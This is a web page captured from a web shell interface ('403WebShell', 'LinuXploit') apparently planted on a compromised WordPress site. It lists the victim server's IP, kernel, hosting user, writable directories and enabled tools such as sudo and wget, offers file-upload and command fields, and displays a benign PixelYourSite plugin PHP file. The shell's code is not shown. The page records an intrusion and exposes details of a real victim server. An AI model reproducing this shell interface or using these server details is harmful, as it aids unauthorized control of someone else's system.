Warning: chmod(): No such file or directory in /home/tuempresavirtual.cl/public_html/wp-content/plugins/appointment-hour-booking/app-booking-plugin.php on line 3
403WebShell
403Webshell
Server IP : 186.64.123.29  /  Your IP : 216.73.217.94
Web Server : LiteSpeed
System : Linux house.hostinglat.cl 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : tuemp9827 ( 1016)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/tuempresavirtual.cl/public_html/wp-content/plugins/pixelyoursite/containers_gtm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tuempresavirtual.cl/public_html/wp-content/plugins/pixelyoursite/containers_gtm/container.php
<?php

namespace PixelYourSite;
defined('ABSPATH') || exit;

require_once PYS_FREE_PATH . '/containers_gtm/containerDownloads.php';

class gtmContainers extends containerDownloads {

    public function __construct() {
        parent::__construct(trailingslashit(PYS_FREE_PATH) . 'containers_gtm/');
    }

    protected function getContainers() {
        return [
            [
                'enable' => true,
                'file_name' => 'GTM-PYS-v1-1.json',
                'show_name' => 'GTM Container Version 1.1',
                'description' => 'Once the file is imported, the GTM Container will have triggers for our events, and variables for our parameters. Version 1.1 comes with GA4 tag support. You must edit the GA4 ID variable and add your own GA4 tag ID.'
            ]
        ];
    }

    /**
     * Public method to get containers for display purposes
     *
     * @return array Array of containers with file information
     */
    public function getContainersForDisplay() {
        return $this->getContainers();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit